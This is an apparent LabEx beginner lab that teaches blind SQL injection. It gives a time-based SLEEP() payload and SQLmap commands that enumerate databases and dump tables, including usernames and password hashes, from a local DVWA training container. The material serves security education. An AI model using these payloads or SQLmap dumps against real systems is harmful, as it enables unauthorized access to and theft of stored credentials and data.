LabEx
Log In Join For Free

🚧 Web Application Vulnerability: SQL Injection (Blind)

Beginner

Introduction

In this lab, you will learn how to exploit SQL injection vulnerabilities in web applications through blind SQL injection techniques. SQL injection is a code injection technique that exploits security vulnerabilities in an application's software by inserting malicious SQL statements into application entry fields. Blind SQL injection refers to scenarios where the application does not provide any error messages or output, making it more challenging to detect and exploit vulnerabilities. The goal of this lab is to understand blind SQL injection and learn how to use the powerful SQLmap tool to automate the exploitation process.

Understanding Blind SQL Injection

Blind SQL injection is a type of SQL injection attack where the application does not provide any error messages or output. Unlike regular SQL injection, where you can observe error messages or the results of your injected SQL queries, blind SQL injection requires a different approach to detect and exploit vulnerabilities.

In this step, we will explore the concept of time-based blind SQL injection, which is a technique used to detect and exploit blind SQL injection vulnerabilities by leveraging time delays. The idea behind time-based blind SQL injection is to inject SQL queries that include a delay function, such as SLEEP() in MySQL. If the injected SQL query is successful, the application will pause for the specified amount of time before returning a response, indicating the presence of a vulnerability.

Here's an example of a time-based blind SQL injection query:

1' AND IF((SELECT COUNT(*) FROM information_schema.tables WHERE table_schema=database())=2, SLEEP(5), 0) AND '1'='1

In this query, the IF statement checks if the number of tables in the current database is equal to 2. If the condition is true, the SLEEP(5) function will pause the execution for 5 seconds before returning a response. If the condition is false, the execution will continue without any delay.

By observing the response time, you can determine if the injected SQL query was successful or not. A delayed response indicates a successful injection, while a normal response time indicates a failed injection.

Exploring SQLmap

SQLmap is a powerful open-source penetration testing tool that automates the process of detecting and exploiting SQL injection vulnerabilities. In this step, we will learn how to use SQLmap to perform blind SQL injection attacks.

First, ensure that SQLmap is installed on your system. If not, you can install it using the following command:

sudo apt-get install sqlmap

Once SQLmap is installed, you can run it against a vulnerable web application to detect and exploit SQL injection vulnerabilities. Here's an example command:

sqlmap -u "http://example.com/vulnerable.php?id=1" --dbs

In this command:

  • -u specifies the URL of the vulnerable page, including any parameters.
  • --dbs instructs SQLmap to enumerate the available databases on the target system.

SQLmap will perform various techniques, including blind SQL injection, to retrieve information from the target system. It will display the results in the terminal.

Other useful SQLmap options include:

  • --tables to list the tables in a database
  • --columns to list the columns of a table
  • --dump to retrieve the data from a table

Here's an example command to retrieve data from a table:

sqlmap -u "http://example.com/vulnerable.php?id=1" -D database_name -T table_name --columns --dump

In this command:

  • -D specifies the database name
  • -T specifies the table name
  • --columns lists the columns of the specified table
  • --dump retrieves the data from the specified table

SQLmap provides various other options and features to customize the attack and gather more information. It's recommended to explore the SQLmap documentation and practice on vulnerable systems to better understand its capabilities.

Hands-on Practice with SQLmap

In this step, you will practice using SQLmap to perform blind SQL injection attacks against a vulnerable web application. Follow the instructions below:

  1. Start the vulnerable web application by running the following command:

    docker run --rm -p 8080:80 vulnerables/web-dvwa

    This command will start a Docker container running the Damn Vulnerable Web Application (DVWA) on http://localhost:8080.

  2. Open a web browser and navigate to http://localhost:8080. You should see the DVWA login page.

  3. Log in with the default credentials:

    • Username: admin
    • Password: password

  4. Once logged in, navigate to the "DVWA Security" page and set the security level to "Low".

  5. Open a new terminal and run the following SQLmap command:

    sqlmap -u "http://localhost:8080/vulnerabilities/sqli_blind/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=YOUR_PHPSESSID_VALUE" --dbs

    Replace YOUR_PHPSESSID_VALUE with the actual value of the PHPSESSID cookie obtained from your browser.

  6. SQLmap will attempt to detect and exploit the blind SQL injection vulnerability. It will first display the database management system (DBMS) information and then list the available databases.

  7. Next, run the following command to retrieve the table names from the DVWA database:

    sqlmap -u "http://localhost:8080/vulnerabilities/sqli_blind/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=YOUR_PHPSESSID_VALUE" -D dvwa --tables

  8. Finally, retrieve the data from the users table by running the following command:

    sqlmap -u "http://localhost:8080/vulnerabilities/sqli_blind/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=YOUR_PHPSESSID_VALUE" -D dvwa -T users -C user,password --dump

    This command will display the usernames and password hashes from the users table.

Throughout this process, observe the output from SQLmap and understand how it detects and exploits the blind SQL injection vulnerability to retrieve sensitive information from the database.

Summary

In this lab, you learned about blind SQL injection, a type of SQL injection attack where the application does not provide any error messages or output. You explored the concept of time-based blind SQL injection and how to leverage time delays to detect and exploit vulnerabilities. Additionally, you learned how to use the powerful SQLmap tool to automate the process of detecting and exploiting SQL injection vulnerabilities, including blind SQL injection. Through hands-on practice, you gained experience in using SQLmap to retrieve database information, table names, and sensitive data from a vulnerable web application. This lab provided you with a solid understanding of blind SQL injection and the tools and techniques used to identify and exploit these vulnerabilities effectively.

Other Tutorials you may like

We use cookies for a number of reasons, such as keeping the website reliable and secure, to improve your experience on our website and to see how you interact with it. By accepting, you agree to our use of such cookies. Privacy Policy